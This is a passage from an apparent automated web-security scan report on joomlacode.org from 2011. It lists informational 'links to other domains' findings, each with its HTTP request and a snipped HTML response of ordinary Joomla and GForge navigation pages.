:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum &amp; Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.74. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp;usg=AFQjCNENvGO0Zh4Fx2-kY4zH0OvaUTL2wg\
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://feeds.joomla.org/JoomlaSecurityNews
  • http://forum.joomla.org/
  • http://gforge.org/projects/as-help
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=
  • http://help.joomla.org/
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/
  • https://gforge.com/gf/project/eclipse/
  • https://gforge.com/gf/project/msproject/
  • https://gforge.com/gf/project/office-addin/
  • https://gforge.com/gf/project/soapsdk/
  • https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp;usg=AFQjCNENvGO0Zh4Fx2-kY4zH0OvaUTL2wg\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:17:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum &amp; Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.75. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNElSqdDFu0YodFAYblvLhKLtlX1gQ\
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://feeds.joomla.org/JoomlaSecurityNews
  • http://forum.joomla.org/
  • http://gforge.org/projects/as-help
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=
  • http://help.joomla.org/
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/
  • https://gforge.com/gf/project/eclipse/
  • https://gforge.com/gf/project/msproject/
  • https://gforge.com/gf/project/office-addin/
  • https://gforge.com/gf/project/soapsdk/
  • https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNElSqdDFu0YodFAYblvLhKLtlX1gQ\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:19:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum &amp; Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.76. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNE5ANxf7dYG1GZzutEtdsOHJv3QDA\
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://feeds.joomla.org/JoomlaSecurityNews
  • http://forum.joomla.org/
  • http://gforge.org/projects/as-help
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=
  • http://help.joomla.org/
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/
  • https://gforge.com/gf/project/eclipse/
  • https://gforge.com/gf/project/msproject/
  • https://gforge.com/gf/project/office-addin/
  • https://gforge.com/gf/project/soapsdk/
  • https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNE5ANxf7dYG1GZzutEtdsOHJv3QDA\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum &amp; Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.77. http://joomlacode.org/gf/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/account/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/account/?action=LostPassword
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/account/?action=LostPassword HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9235


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.78. http://joomlacode.org/gf/project/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/?action=ProjectTroveBrowse&_trove_category_id=318
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/?action=ProjectTroveBrowse&_trove_category_id=318 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:26:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110567


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.79. http://joomlacode.org/gf/project/com_joodater/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/com_joodater/news/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/com_joodater/news/?action=NewsThreadView&id=3280
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-news
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/com_joodater/news/?action=NewsThreadView&id=3280 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:30:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
